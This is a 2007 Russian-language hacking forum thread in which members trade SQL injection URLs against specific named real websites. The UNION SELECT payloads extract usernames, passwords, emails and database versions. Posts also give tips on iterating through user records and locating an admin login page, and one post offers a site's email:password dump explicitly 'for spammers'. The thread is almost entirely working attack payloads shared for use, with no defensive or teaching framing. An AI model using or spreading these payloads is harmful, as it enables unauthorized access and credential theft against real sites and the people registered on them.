09.04.2007, 12:21
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами:
10085717
Репутация:
590
|
|
zonewm.biz
Код:
http://zonewm.biz/showasf.php?id=-4+union+select+1,2,3,concat(pass,0x3a,mail,0x3a,id),5,6,7,8,9+from+user/*
Код:
http://kvint.biz/index.php?id=-14+union+select+1,user()/*
Последний раз редактировалось XTErner; 09.04.2007 в 12:28..
|
|
|
09.04.2007, 12:34
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами:
10307906
Репутация:
1365
|
|
ВНИМАНИЯ
offtop:
По причинам накручевания репутации через тему SQL Инъекции , всем активным участникам этой темы было поставлено минус в виде - Участие в цепочке по накрутке репы через тему " SQL Инъекции "! Призываю вас братья, остановитесь! Хватит накручивать себе репу, нас зовут наркоманами, мы не кто. Мы не хотим в МОА, потому что нас там не ждут. Но мы боримся и будем выживать на этом поле сражения, нам наплевать на ваши предупреждения в виде "минуса", потому что не репутация нас волнует, а тот ФАКТ что нам интересно ИСКАТЬ УЯЗВИМОСТИ СПОСОБОМ SQL INJ и ДЕЛИТЬСЯ ЗНАНИЯМИ С ДРУГИМИ! |
|
|
|
09.04.2007, 14:16
|
|
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
С нами:
10532546
Репутация:
811
|
|
http://www.medsait.ru/show_cat2.php?grid=-1+union+select+1/*
http://www.medsait.ru/show_cat2.php?grid=-1+union+select+user()/*
неужели валуехост всем так нравиться)
|
|
|
|
09.04.2007, 14:22
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
2alextoun
http://www.medsait.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,passwd)+from+u ser+limit+1,1/*
Прогоняя через лимит просматриваем юзеров.
Админка:
http://www.medsait.ru/admin/
Код HTML:
<input type=text size=15 name=username class=submit3>
<input type=password size=15 name=passwd class=submit3>
|
|
|
|
09.04.2007, 14:25
|
|
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
С нами:
10532546
Репутация:
811
|
|
Прогоняя через лимит просматриваем юзеров.
Админка:
http://www.medsait.ru/admin/
блин всё время забываю админку найти...
|
|
|
|
09.04.2007, 15:40
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами:
10307906
Репутация:
1365
|
|
http://www.rusins.ru/ru/index.php?newid=-300+union+select+concat(version(),char(58),user())/*
=\
|
|
|
|
09.04.2007, 16:36
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
http://youworkforthem.com/list.php?cat=-9+union+select+1,convert(version()+using+latin1),3 ,4,5,6,7,8,9+from+users
0_o Ты Работаеш На Них! =)
|
|
|
|
09.04.2007, 16:37
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами:
10085717
Репутация:
590
|
|
Код:
http://www.togather.biz/showcg.php?id=-4+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8,9,10,11/*
|
|
|
|
09.04.2007, 17:14
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
http://www.fight.org/subsection.php?cat=-10+union+select+1,version(),3,4,5,6,7,8/*&sec=29&sub=7
когда будете пробиваться дальше, не убирайте переменные после начала комментария, на сайте видимо стоит какой то скрипт, который проверяет правильность строки, если убрать не нужные переменные - выкидывает на индекс =\
|
|
|
|
09.04.2007, 17:20
|
|
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
С нами:
10703786
Репутация:
343
|
|
Спамерам база мыл
Код:
http://www.timegifts.ru/index.php?description=-1'+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(email_user,0x3a,password),0x75),0x75)+from+us
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
